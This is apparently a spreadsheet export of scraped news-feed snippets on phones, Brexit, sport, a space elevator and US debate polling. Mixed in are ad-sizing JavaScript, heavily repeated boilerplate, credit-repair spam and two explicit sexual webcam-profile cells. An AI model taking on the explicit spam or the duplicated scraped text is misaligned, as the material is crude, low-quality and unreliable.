10+, but it’s not as much as you’d expect going from a 3,500mAh battery down to a 2,900mAh cell. I got 10 hours, 8 minutes of video playback time versus 12 hours, 10 minutes on the Note 10+ (and 10 hours, 54 minutes on the standard Galaxy S10). The smaller battery means that it doesn’t matter quite so much that the Note 10 doesn’t support the 45-watt fast charging that the larger phone does. It still supports 25-watt charging, which can juice it past 50 percent in half an hour, and to a full charge in an hour. It comes with a 25-watt charger. What About 5G? 5G has to factor into any decision about high-end phones right now, but especially the Note series, as the Note 10+ is going to have several 5G models. I don’t see that as a plus, because the Note 10+’s 5G models are something of a mess. As I explain in my full story on the topic, none of them are going to support all of the frequency bands used by any major US carrier. That means 5G is not a reason to choose the larger Note over the smaller one. It’s probably best just to pretend the 5G models don’t exist, unless you’re a 5G solution or app developer. Those folks will need to get hold of 5G phones now to develop killer apps for next year. The rest of us should just plow ahead and get the best 4G phone we can. Which Note to Choose? The Galaxy is full of stars. Handling Samsung’s smaller Galaxy Note 10, I’m struck by how similar its five flagship phones are this year, and how they let you precisely choose the feature set and price you want. With the company’s full array, we now have the Samsung Galaxy S10e, at $749; the S10, at $899; the Note 10, at $949; the S10+, at $999; and the Note 10+, at $1,099. There are the 5G variants too, for more money, but let’s stick with this list. Come to the Note if you want the pen. If you don’t want the pen, get one of the Galaxy models. The Note line is currently the only phone line with a truly responsive, active stylus. I’ve been using a lot of pen-enabled devices recently, and it strikes me how right Samsung has gotten things with the Note line. Beyond S Note, Samsung has managed to nurture a decent lineup of pen-enabled apps, including entries from Adobe, Autodesk, and Microsoft. You can’t always take that for granted; on the Onyx Boox Max 3, for instance, using any app other than Onyx’s own with the pen is an utter mess. On the Note, Microsoft OneNote is better than Evernote in terms of responsiveness. The Galaxy Note 10 is a more affordable, more easily handled version of the Note 10+. What’s not to like? Slightly shorter battery life, for one, but also less screen real estate to draw on. If the Note experience is all about the pen, it turns out that having a slightly wider screen makes it less likely that your drawing or note-taking is going to slide off the side of the screen. But as I said earlier, the Note 10 is a phone for smaller-handed artists and note-takers. And among Samsung’s plethora of options this year, it’s going to be just right for its very specific audience. Bottom Line: The reasonably sized Samsung Galaxy Note 10 is the answer for sketchers and note-takers who can’t quite handle the larger Note 10+. Top Comparisons Source link</t>
  </si>
  <si>
    <t>The European Union says talks with the U.K. to find an amicable divorce deal were back on track, despite huge challenges and a looming end-of-month deadline for the U.K. to leave the bloc. CBC | World News</t>
  </si>
  <si>
    <t>17 October 2019 – BBC News A tiny microphone is being attached to participants’ knees to pick up high-frequency sounds. Even thought the sounds are not audible to humans, the waveforms can be analysed by computers to give an insight into knee health. The aim is for a better diagnosis of osteoarthritis and more tailored treatments. Source</t>
  </si>
  <si>
    <t>AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers Posted By: PL News October 10, 2019 STRIKER Jermain Defoe admitted he would like to stay at loan club Rangers next season. The former England international agreed an 18-month loan deal to Ibrox from Vitality Stadium in January. Defoe’s Cherries contract expires in 2020, which aligns with the proposed conclusion of the loan at Rangers. And the former West Ham, Portsmouth and Tottenham star, who has scored 12 goals in 14 games for the Scottish giants this season, said he would like to remain with Steven Gerrard’s men beyond his current terms. He told Sky Sports: “I speak to the manager (Gerrard) all the time. He’s just basically said to me ‘I’m delighted with how you’re playing but not just that. With how you are around the place with the younger lads’. “Hopefully we can be successful together this season and next season. Hopefully at some point something will happen. I want to stay.” He added: “As a young kid I used to watch Ally McCoist with all his goals and stuff like that. “When I signed the manager sent me a message: ‘What number do you want? Nine or 10?’. “I said number nine, he said ‘yeah I thought so’. It’s a special football club to wear that shirt and score goals.” The post AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers appeared first on Premier League. The post AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers appeared first on Premier League. The post AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers appeared first on Premier League. The post AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers appeared first on Premier League. The post AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers appeared first on Premier League. The post AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers appeared first on Premier League. The post AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers appeared first on Premier League. The post AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers appeared first on Premier League. The post AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers appeared first on Premier League. The post AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers appeared first on Premier League. The post AFC Bournemouth striker Jermain Defoe wants to stay at loan club Rangers appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Australian rare earth miners could become a major exporter to the United States as the Trump administration looks to lessen its reliance on China.</t>
  </si>
  <si>
    <t>Since the young The Kitchen Maker-Caesarstone team of Jordan Girdis, Lachlan Doyle and Tom Quigley came together last year, their progress in the highly-competitive Australian 18 Footers League fleet has been spectacular, and the team’s performance in last Sunday’s opening race of the 2019-2020 Season on Sydney Harbour shows that their progression has taken another step forward. One highlight of their rookie year together was an outstanding third placing, behind two of Australia’s most experienced 18ft Skiff teams, in the 2018-2019 National Championship on Sydney Harbour. The Kitchen Maker-Caesarstone team got off to an impressive start to the new season when it was on the pace from the start in last Sunday’s Race 1 of the Spring Championship. The boys led the fleet around the Easterly course before surrendering the lead to the eventual winner, Noakesailing, at the final windward mark under the 3-buoys handicap system. Their close second placing will now see The Kitchen Maker-Caesarstone become ‘scratch boat’ on Sunday, alongside Winning Group and its champion crew of John Winning Jr., Seve Jarvin and Sam Newton. As Jordan Girdis said: “We’ve come a long way from the 10-minute boat two seasons ago to lining up on Sunday as the scratch boat.” “Micah Lane (now skipper of Smeg) took me for my first 18 ride about 15 years ago when I was sailing Manly Juniors. It’s great now to compete against Micah and those teams we looked up to as junior sailors” Jordan credits part of his team’s development to the experience of competing in the European Championship at Lake Garda during the off-season. “Garda, as always, was not just a brilliant training regatta, but also some of the best sailing conditions we’ve ever experienced. Adam Gilson, who filled in for Lachlan Doyle, brought his skiff experience into the team which really helped our on the water close quarter racing as well as switching gears.” “We’ve packed on about 15kgs this season, which seems to be helping already.” “Our team works well both on and off the water and we are privileged to have a long-time sponsor, The Kitchen Maker-Caesarstone, supporting us and being actively involved with our campaign.” Steve Quigley, former JJ Giltinan (world) champion and father of bowman Tom Quigley, has been a great mentor to the young team and is looking forward to the new season after watching the performance in last Sunday’s opening race of the season: “It was a great start to the season and hopefully an indication of things to come as the competition gets more serious.” “I didn’t think their boat speed was at the level of say the Winning Group and Noakesailing, who were setting the pace, but they sailed a good tactical race in tricky conditions, and they’re showing positive signs of being able to contend at the top level in their second season together. The boat speed thing we can work on and we have 3 new North sails to add in the coming weeks so that will improve.” The Australian 18 Footers League’s 2019-2020 Season continues Sunday with Race 2 of the Spring Championship. Spectators can see all the teams in the rigging area, then follow the racing on board the spectator ferry, which leaves Double Bay Wharf, alongside the rigging area, each race day at 2pm. Purchase tickets online at: https://www.eventbrite.com.au/e/spring-championship-race-1-tickets-69976974013?aff=ebdssbdestsearch The livestream video team will also be out on Sydney Harbour to capture all the action. For those who can’t make it onto the water: Live streaming is available by going to www.18footers.com and clicking on the “18 Footers TV” link As well as watching the livestreaming coverage, you can also follow all the club’s racing throughout the entire 2019-2020 Racing Season: Club Website www.18footers.com Twitter @18skiff Instagram @18skiff Facebook International 18Ft Skiff The post THE KITCHEN MAKER-CAESARSTONE LOOKS SET FOR A BIG SEASON appeared first on Australian 18 Footers League.</t>
  </si>
  <si>
    <t>David Lagercrantz has matched Stieg Larsson by writing three novels in the Millennium series.</t>
  </si>
  <si>
    <t>The Coeur d’Alene Press – Outdoors, Reeling from some major ripple effects Steelhead fishery closure on Clearwater and Snake rivers will take economic toll ‘); $(this).addClass(‘expanded’); $(this).animate({ height: imgHeight + ‘px’ }); } } }); $(‘#weather-forcast’).html(‘‘); }); function closeExpand(element) { $(element).parent(‘.expand-ad’).animate({ height: ’30px’ }, function () { $(element).parent(‘.expand-ad’).removeClass(‘expanded’); $(element).remove(); }); } function runExpandableAd() { setTimeout(function() { $(‘.expand-ad’).animate({ height: $(‘.expand-ad img’).height() + ‘px’ }); }, 2000); setTimeout(function() { $(‘.expand-ad’).animate({ height: ’30px’ }); }, 4000); } function customPencilSize(size) { var ratio = 960/size; var screenWidth = $(‘body’).width(); if (screenWidth &gt; 960) screenWidth = 960; $(‘.expand-ad__holder’).parent(‘.ad’).css(‘padding-bottom’, (screenWidth / ratio) + ‘px’); $(‘.expand-ad__holder’).css({ height: (screenWidth / ratio) + ‘px’ }); $(‘.expand-ad’).css({ height: (screenWidth / ratio) + ‘px’ }); $(‘.expand-ad img’).css(‘height’, ‘auto’); $(‘.expand-ad embed’).css(‘height’, ‘auto’); $(‘.expand-ad embed’).css(‘width’, ‘100%’); $(‘.expand-ad embed’).css(‘max-width’, ‘960px’); } function customSize(size, id) { var element = jQuery(‘script#’ + id).siblings(‘a’).children(‘img’); if (element.length 960) screenWidth = 960; element.css(‘height’, (screenWidth / ratio) + ‘px’); } (function () { window.addEventListener(‘message’, function (event) { $(document).ready(function() { var expand = event.data.expand; if (expand == ‘false’) { $(‘.expand-ad__holder’).removeClass(‘expand-ad__holder’); $(‘.expand-ad’).removeClass(‘expand-ad’); } }); }, false); function loadIframe(size, id) { $(‘.ad’).each(function () { var iframeId = $(this).children(‘ins’).children(‘iframe’).attr(‘name’); var element = $(this).children(‘ins’).children(‘iframe’); if (element.length &gt; 0) { var ratio = 960 / size; var screenWidth = $(‘body’).width(); if (screenWidth &gt; 960) screenWidth = 960; element.css(‘height’, (screenWidth / ratio) + ‘px’); } }); } })();</t>
  </si>
  <si>
    <t>Hello STAMPlorations Friends! Welcome to Tuesday's Inspiration feature. This week the Inspiration Girls have chosen to work with stamps, dies, stickers and shaker blends of their choice for some truly seasonal makes. We'll still randomly draw a winner from all the comments left on our Inspiration posts, have a look and leave a comment for your entry to win a $10 gift certificate. Karola {Trendy Leaves, Hello Word Die} Deepti {Beautiful You, Crazy Double Running Stitch Rectangle Nesting Dies} Maria {Rosebuds, Stitched Spring Landscape Die, 5 Love Words Dies} Monika {Coffeeology Clear Stickers, Mixed Media Backgrounds #2 Clear Stickers, Latte Love, Floral Bliss, Scribbly Splattery Grunge} Shirley {Layered Snowman} Vicki {Blossom Spray #1, Celebrate Big Word Die, Sparkly Greens Shaker Blends} ***** PS: Check out the store's CURRENT PROMOTIONS page for some awesome deals: October fall sale, new CUTplorations dies pre-order sale, coffee-themed sale, freebies with orders, and more!</t>
  </si>
  <si>
    <t>Every year, through their “Take Our Kids to Work Day” TM program ( www.takeourkidstowork.ca), the Learning Partnership promotes the opportunity for Grade 9 students to accompany their parent or guardian to the workplace to learn more about jobs and careers.… The post Career Connection’s Grade 9’s Feed the Minds of Youth Luncheon appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>The Katmai National Park &amp; Preserve in Alaska holds an annual competition for the fattest bear in the state’s Brooks River as the bears pack on pounds ahead of hibernation. You can weigh in on Fat Bear Week The post You can weigh in on Fat Bear Week appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>EMERGENCY services are on the scene of a crash on Steiglitz Rd.</t>
  </si>
  <si>
    <t>Doubts have been raised about news of progress in Brexit negotiations, with a key Irish figure saying the current plan "cannot work".</t>
  </si>
  <si>
    <t>Manika Dadson</t>
  </si>
  <si>
    <t>A typical show day for Gary Clarke involves getting up early to wash and blow-dry his Hereford cattle before the crowds arrive. It is dedication like this which has helped the humble Burnie Show reach its 100th year.</t>
  </si>
  <si>
    <t>Two winners will be announced on Thursday after the prestigious prize had a year off in 2018. The post Nobel Prize for Literature to name two winners after scandal-hit year appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>The NRL's integrity unit launches an investigation after a video posted on social media appears to show Melbourne Storm's Nelson Asofa-Solomona swinging punches during a brawl outside a nightclub.</t>
  </si>
  <si>
    <t>As the PM accuses the major banks of "profiteering" and the Treasurer remains committed to a surplus, economists warn the RBA has set itself a near impossible task.</t>
  </si>
  <si>
    <t>Tim Biggs</t>
  </si>
  <si>
    <t>All the important specs and details we have so far on the PlayStation 5 and Xbox 'Project Scarlett'.</t>
  </si>
  <si>
    <t>An RAF aircraft carrying the Duke and Duchess of Cambridge twice tried to land in Islamabad. The post Duke and Duchess: Royal plane aborts landing after Pakistan storms appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>The actor officially filed for divorce from Miley on 21 August (19). See full article at Film-news.co.uk » The post Liam Hemsworth's new girlfriend dreamed of bedding hunk in June appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>deveshwar0</t>
  </si>
  <si>
    <t>Original Coupon Deal Alcohol Content: 58.4 % Small Batch Wild Turkey Rare Breed is a barrel proof whiskey, meaning no water is added during the bottling process. It is a marriage of Wild Turkey 6, 8 and 12 year old Bourbons aged in white oak barrels. For reference, it's currently $97.99 at Dan Murphy's.</t>
  </si>
  <si>
    <t>HEART ATTACK is a potentially deadly condition. There is mounting evidence that a person’s diet could play a decisive role in determining if they are at risk. What three foods could trigger a heart attack and should be avoided? Daily Express :: Health Feed</t>
  </si>
  <si>
    <t>My Kinks: Ever thine, ever mine, ever ours… Webcam profile: Everything you need to know – you can ask me during my streams Favourite sex position: all What I do in my amateur show: I get wet from the mans tushy, I love strong arms and whatever else the veins are blown out, mmm, caviar, oooooh, more cheekbones, I adore men What I don’t like: What turns me off are rude , brash, arrogant, deceitful men Gallery</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/F_Y4x8Rbz-E/space-elevator-on-earth-moon-2019-9 A giant elevator could connect Earth to space using current technology, experts say — here’s how that might work A space elevator on Earth or the moon could make space travel and cargo transport easier, cheaper, and more sustainable. Companies in China and Japan hope to build such an elevator by 2045 and 2050, respectively. Japanese researchers have even tested miniature prototypes in space. Experts say a space elevator could be possible with current technology, especially if we were to build it on the moon. A lunar elevator would not have to contend with the Earth’s gravitational force or space debris. There are still many details to iron out, though, including how to build such a monumental structure. Visit Business Insider’s homepage for more stories. A growing number of scientists and space-technology enthusiasts are looking into ways to construct a huge elevator, either on Earth or the moon, that could transport cargo to and from space. In a study published in September, which has not been peer reviewed, two graduate students proposed a version of a space elevator that would stretch from the moon to Earth’s satellite-level orbit. They said the structure could be built with current technology. “They’re right, and we were right first, that the lunar elevator is feasible technology,” Michael Laine, president of space-elevator development company LiftPort Group, told Business Insider. Other advocates of space elevators have argued for years that building such a structure is feasible with current technology and could open up new frontiers of space exploration. Here’s how a space elevator would work. SEE ALSO: NASA’s future missions will explore an icy moon of Jupiter, collect samples on Mars, and more. Here’s what’s coming in the next 10 years. SEE ALSO: 16 recently discovered exoplanets could offer our best chance of finding alien life outside the solar system In 1895, Russian rocket scientist Konstantin Tsiolkovsky gazed at the Eiffel Tower and imagined it stretching into space. His daydream became the first pitch for a space elevator. He imagined a tower like that could carry cargo to geostationary orbit — the height at which satellites can sync their orbit with Earth’s rotation — 35,786 kilometers (22,236 miles) above sea level. As objects ascended the tower, they would gain horizontal velocity from the Earth’s rotation and could use that speed to launch into orbit. Relative to rockets, space elevators would be a cheaper, faster way to get cargo and people off of Earth. That’s because liftoff is one of the most expensive and difficult parts of space travel. “The high cost of space transportation coupled with unreliability is a virtual padlock on the final frontier,” reads a 2008 NASA fact sheet. “Our dreams of everyday life in space and its promise for a better life on Earth are hostage to the high cost of space transportation.” That hasn’t changed. On average, getting material from Earth’s surface into space costs about $20,000 per kilogram, or roughly $10,000 per pound. Since NASA’s space shuttle program ended in 2011, private companies have been launching supplies to the International Space Station. “The space elevator would essentially be an economic game-changer for the space industry,” Tyler Harris, an engineer at the Pacific Northwest National Laboratory, told Business Insider. By some estimates, a well designed elevator would cut the cost of cargo transportation to as low as $100 per kilogram. Even at $1,000 per kilogram, that would be just 5% of the current cost. The basic design of a space elevator would involve a cable, or “tether,” that could stretch from an anchor on the ground to a counterweight in space. A heavy car, or “climber,” would travel up and down the tether. The elevator would carry cargo to geostationary orbit, past the region where Earth’s gravity is strongest. The centrifugal force of the Earth’s rotation would hold up the tether. Think of holding one end of a string with a stone attached to the other end, and whirling it around in a circle. Centrifugal force is what pushes the stone outwards and makes the string stretch out its full length. In a space elevator, the tether would be like that string, and the counterweight would be like the stone. Experts say this type of structure could be built with current technology. Cost estimates range considerably, from $1 billion to nearly $90 billion. Harris recently conducted an assessment of three different space-elevator designs and found that they would all be “environmentally sustainable and economically viable.” The $90 billion cost estimate comes from the Obayashi Corporation, which is based in Japan. The company wants to build a space elevator by 2050. The China Academy of Launch Vehicle Technology, a subdivision of the nation’s main space-program contractor, wants to build a space elevator by 2045, though company has not released any details about those plans. NASA has funded research on space elevators, too, but has never committed to building one. Obayashi expects it to take 20 years to construct the cable from a 400-meter base that floats in water. The company envisions the final product carrying 100-ton climbers off of Earth. The Japan Aerospace Exploration Agency (JAXA) launched a miniature version of a space elevator in September 2018 to see how it reacted to the space environment. The device, called Space Tethered Autonomous Robotic Satellite – Miniature Elevator (STARS-Me), was designed by researchers at Shizuoka University. It involved two CubeSat satellites, each of which could communicate with the ground, with a 14-meter (46-foot) tether between them. The goal: crawl a Bluetooth-enabled climber up the tether from one CubeSat to the other. The launch was successful, according to a February report, but the researchers had difficulty communicating with one of the CubeSats. They have yet to verify whether the climber successfully traveled up and down the tether. The same Japanese research team is planning to launch a larger version of the device. The next experiment involves a 2-kilometer (1.2-mile) tether and a robot that could clear away space debris. The researchers haven’t announced any timeline yet, though. LiftPort, meanwhile has conducted space-elevator technology demonstrations on the ground. Climbers ascended cables as high as 1,000 feet. Youtube Embed: //www.youtube.com/embed/THEzEwQ_buU Width: 560px Height: 315px Laine started looking into space elevators as a member of the NASA Institute for Advanced Concepts (NIAC), which researched such ideas from 1998 to 2007. The researchers found such a project feasible, but did not continue research after NIAC closed. So LiftPort pursued the technology on its own. The trickiest part of developing a space elevator is finding the right material for the tether. The tether would have to withstand the weather in Earth’s atmosphere, radiation from the sun, and impacts from meteorites and other debris. Space-elevator advocates think carbon nanotubes could be the answer — the hollow tubes of carbon are just nanometers wide yet 100 times stronger than steel. The problem is that these powerful fibers are a few meters long at most ⁠— nobody can get them anywhere near long enough to span the 22,000-plus miles required for a space elevator. Another hurdle keeping space elevators in the realm of science fiction: space debris. The European Space Agency estimates that 128 million objects smaller than 1 centimeter are orbiting Earth, along with another 900,000 objects that measure 1 to 10 centimeters. Any space elevator would be subject to collisions with these objects, so it would have to be capable of withstanding or out-maneuvering them. However, the moon doesn’t contend with all that debris, and lower gravity there means that more materials could support their own weight. So some researchers think a lunar space elevator is a better place to start. “The classical space elevator is a really tough problem because the Earth’s gravity field is so great that you need such strong materials that we don’t have right now,” Jerome Pearson, an aerospace engineer who first proposed the lunar elevator in 1977, told NBC News. “On the other hand, you could build a lunar space elevator with existing materials right now.” Unlike a space elevator that rises from Earth, a lunar elevator would not use centrifugal force. Gravity would do all the work. At LiftPort, Laine is also working on a lunar elevator concept. For the tether material, he has his eye on Dyneema, a polyethylene plastic fiber that’s 15 times stronger than steel. But Laine said Dyneema is not a “Goldilocks material,” since it doesn’t hold up to radiation as well as he would like. LiftPort has also been experimenting with Kevlar and carbon nanotubes. “We have a really good handle on the most probable materials, and that those materials will very likely work,” Laine said. One analysis calculated that a lunar elevator could pay for itself after 53 uses, since it could cut at least two-thirds of the cost of landing on the moon and reduce the cost of sample-return missions at least nine-fold. You can read that full cost analysis here. “There are a lot of advantages with a lunar space elevator,” Pearson said. “And with this new NASA program to return to the moon, there may be additional interest.” For now, though, any space elevator remains theoretical. “The big idea is still subject to a lot of details that we don’t have the answers to,” Laine said. He added that the LiftPort team still needs to research the effects of rapid temperature changes that cargo would undergo as it ascended the space elevator. Work is also needed to determine how to protect cargo from solar radiation and how potential tether materials handle atmospheric changes. Then, of course, there are the complicated logistics of building such an elevator in the first place. Ironing out those details is a slow process in these early stages. For now, it involves a lot of paperwork, complicated simulations, and financing efforts, Laine said. “It’s the boring, mundane task of building the biggest thing ever,” he added. But if a space elevator eventually becomes a reality, it could also help us access resources in space. “Not only does it enable new space exploration and opportunities in space, but the way I look at it is using those resources to improve sustainability on Earth,” Harris said. Asteroids can be literal treasure troves, since they contain valuable elements like gold, platinum, and iron. Mining materials on an asteroid could mean that we’re not extracting those resources from the Earth. Once we figure out how to extract valuable resources in space, that may open up possibilities for further exploration. For example, water collected in space could be broken down into hydrogen and oxygen to make rocket fuel, which could then send spaceships further. “To enable us access to all of these space resources, we need to find a better, cheaper way to get into orbit,” Harris said. Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/F_Y4x8Rbz-E/space-elevator-on-earth-moon-2019-9 The post A giant elevator could connect Earth to space using current technology, experts say — here’s how that might work appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>The 47 year old now feels she’s a business leader thanks to her Goop empire. See full article at Film-news.co.uk » The post Gwyneth Paltrow celebrates 10 years of Goop with topless photoshoot appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>NASA's InSight lander on Mars has captured the low rumble of marsquakes and a symphony of other otherworldly sounds.</t>
  </si>
  <si>
    <t>My Kinks: I LOVE HAIRY AND BIG LEGS THIS MAKE ME SO HARD AND Webcam profile: I AM LATINO GUY I LIKE SO MUCH GO TO GYM AND MAKE MY BODY ATTLETIC… IF YOU LIKE IT GIVE TO MUCH LOVE Favourite sex position: ALL THE POSITIONS ARE PERFECT TO ME… What I do in my amateur show: I LIKE HAIRY ASS AND COCK… IF YOU ARE A GOOD MAN SURE YOU HAVE ALL MY ATTENTION What I don’t like: I DONT LIKE BLA BLA BLA BLA Gallery</t>
  </si>
  <si>
    <t>Federal Reserve officials began debating how far their current interest-rate cutting campaign should extend even as they agreed to lower rates last month.</t>
  </si>
  <si>
    <t>Rebecca Joseph</t>
  </si>
  <si>
    <t>The company told Global News that the violence was "clearly fictional."</t>
  </si>
  <si>
    <t>A new foundation to help fund lawsuits against perpetrators of child sexual abuse is launched, with profits from successful legal action used to help victims and survivors.</t>
  </si>
  <si>
    <t>Virginia Credit Repair | (888) 630-5917 Virginia Free Credit Repair Counseling call (888) 630-5917 remove bankruptcy, free consumer report, fix bad credit, check your annual Equifax, TransUnion, Experian credit report. Retirement Life for Fred SmithAfter many years of endless days at the office, meetings, and... Monday 07 October 2019 12:10 AM UTC-05 Retirement Life for Fred Smith After many years of endless days at the office, meetings, and traveling, many look forward to retirement. Although Fred Smith has stepped down as the …</t>
  </si>
  <si>
    <t>Launched on October 4, 1957, the Soviet Union's first artificial satellite went into orbit around the earth. Known as Sputnik 1, it was seen by many people across Victoria</t>
  </si>
  <si>
    <t>When they tune into Tuesday night’s CNN/New York Times Debate, what will Democratic voters be hoping to see? And what can opinion polls tell us about where the primary electorate stands on the issues? Recent polls show that Democratic voters are most concerned about health care, gun control, climate change and immigration. Still, in poll after poll, they say decisively that nominating a candidate who can beat President Trump in the general election is more important than finding one whose views align perfectly with their own. With Senator Elizabeth Warren of Massachusetts running neck-and-neck with former Vice President Joseph R. Biden Jr., the stakes on Tuesday are higher than at any point in the race thus far. Here’s a glimpse at the issues and ideas that will be on many viewers’ minds as they watch the Democratic debate. Trump and Impeachment The House’s impeachment inquiry is underway, and Democrats broadly support removing Mr. Trump from office. Roughly nine in 10 Democratic voters said in a Quinnipiac poll released last week that they had been paying at least some attention to impeachment news, and nearly as many said that if a president asked a foreign leader to investigate a political rival — which Mr. Trump did — that is cause enough to be impeached and removed. But the president may not be the only politician imperiled by the controversy. At Tuesday’s debate, that political rival, Mr. Biden, will be looking to assuage Democrats’ fears about his family’s role in the Ukraine story. By a margin of 50 percent to 32 percent, Democrats nationwide said in an NPR/PBS NewsHour/Marist poll this month that Mr. Biden’s chances of becoming the Democratic nominee were likely to be more hurt than helped by the fact that Mr. Trump had mentioned him in a phone call with the Ukrainian leader — even though Mr. Biden is not believed to have done anything wrong. And ultimately, a candidate’s general election appeal is paramount to Democratic voters. By a wide margin — 61 percent to 37 percent — Democrats said in a separate NPR/PBS NewsHour/Marist poll last month that they cared about finding a nominee who was likely to beat Mr. Trump more than they cared about nominating one who personally inspires them. Health Care and Medicare for All Disagreements over health care dominated the first three Democratic debates, and the issue is likely to play a prominent role in Tuesday’s. The rising costs of health insurance and pharmaceutical drugs continue to worry voters. A Kaiser Family Foundation poll in September found that seven in 10 Americans believed the federal government should make lowering prescription drug prices a top priority. Sixty-four percent also considered lowering the overall cost of health care to be a top priority. Among Democrats, those numbers are even higher. Yet Democratic candidates disagree on how to achieve these goals. Ms. Warren and Senator Bernie Sanders of Vermont spent much of the first three debates arguing on behalf of Medicare for All, which would effectively replace private health insurance with a government-run system. Mr. Biden and other more moderate candidates have only endorsed a public option, which would allow Americans to choose between a government plan and private ones. Last month’s Kaiser poll found that the general public was about evenly split on whether to support Medicare for All, but Democratic voters largely supported the idea. More than three quarters of Democrats nationwide favored creating a national Medicare for All program, with 51 percent favoring it strongly, according to the poll. But as is often the case, people’s responses depend on how the question is worded. In a Quinnipiac poll last month, when given a choice between keeping the private health care system and building on Obamacare, or replacing private insurance outright with Medicare for All, just 47 percent of Democratic voters chose Medicare for All, compared to 44 percent who preferred a more incremental approach. This suggests that candidates advocating a fully government-run system need to convince more Democratic voters to unite around the idea. But less consensus exists on what to do with the assault weapons that Americans already own: All the candidates support some kind of program in which the government would buy weapons back from gun owners, but none of the three leading Democrats — Mr. Biden, Ms. Warren or Mr. Sanders — support making that program mandatory. Seven in 10 Democratic voters support mandatory buybacks, according to an August Quinnipiac poll, although less than half of all voters do. There is a similar lack of consensus among the Democratic candidates on whether to force all gun owners to register their weapons in a national database. Democratic politicians long dismissed the idea of a gun registry as a fear-mongering tactic from the National Rifle Association, but it now enjoys broad support from the public: 62 percent of Americans back the idea, including 85 percent of Democrats. Most candidates now favor establishing a registry, though some — including Mayor Pete Buttigieg of South Bend, Ind. — do not. Others, like Mr. Biden and Mr. Sanders, say it should apply only to owners of assault weapons. Climate Change Democratic voters widely believe that climate change represents an international emergency — 84 percent said so in the August Quinnipiac poll — and roughly nine in 10 think the United States is not doing enough to address global warming. All the major Democratic candidates have expressed support for the Green New Deal, though some have been more guarded than others. All five senators who will debate Tuesday night co-sponsored the bill. Mr. Buttigieg has simply called it “the right beginning,” while Mr. Biden’s campaign website endorses it as a “crucial framework.” But the Green New Deal enjoys broad support from the American public, with 63 percent of respondents to an NPR/PBS NewsHour/Marist poll in July saying they like the idea of investing government money to fund sustainable infrastructure projects and green jobs. Among Democrats, it’s a particularly winning concept; 86 percent of Democrats nationwide back the Green New Deal, the poll found. Instituting a tax on carbon emissions enjoys less support from the public — just 50 percent of Americans like the idea, according to that poll — but 71 percent of Democrats support it. Immigration Even as Mr. Trump has made cracking down on immigration a central facet of his administration, Americans have generally become more accepting of immigrants. This year for the first time, a majority of Americans (55 percent) said in a Gallup poll that they believed immigration tends to help the United States economy, not hurt it. For Democrats, that’s especially true. And a recent Pew study found that views of Immigration and Customs Enforcement — the agency most directly associated with the president’s aggressive immigration policies, and which some immigration activists want abolished — have taken a negative turn. Fifty-four percent of all Americans now hold an unfavorable view of ICE, a seven-point jump from last year. And Democrats in particular feel this way: 77 percent of them expressed a negative view of ICE. By a wide margin, Democrats believe immigration should be either kept at current levels or increased: According to Gallup, 41 percent of Democrats and Democratic-leaning independents want to encourage more immigration into the country, compared to just 13 percent who want it discouraged. That marks a 10-point leap since Mr. Trump’s election. And it’s clear that Democrats worry about the vilification of immigrants — a central facet of Mr. Trump’s public identity. A full 82 percent of Democratic voters said they considered prejudice against immigrants a “very serious” problem in a recent Quinnipiac University poll. Source link</t>
  </si>
  <si>
    <t>"It became evident to me that I was holding onto someone who killed someone,” said one of the school's vice-principals who helped detain the suspect.</t>
  </si>
  <si>
    <t>Neil Breen</t>
  </si>
  <si>
    <t>The Sydney Roosters run the risk of becoming the new Manly: the most hated club in the competition. And they'll only have themselves to blame.</t>
  </si>
  <si>
    <t>Police arrest seven women and three men on suspicion of conspiracy to cause a public nuisance. Read more? Click here</t>
  </si>
  <si>
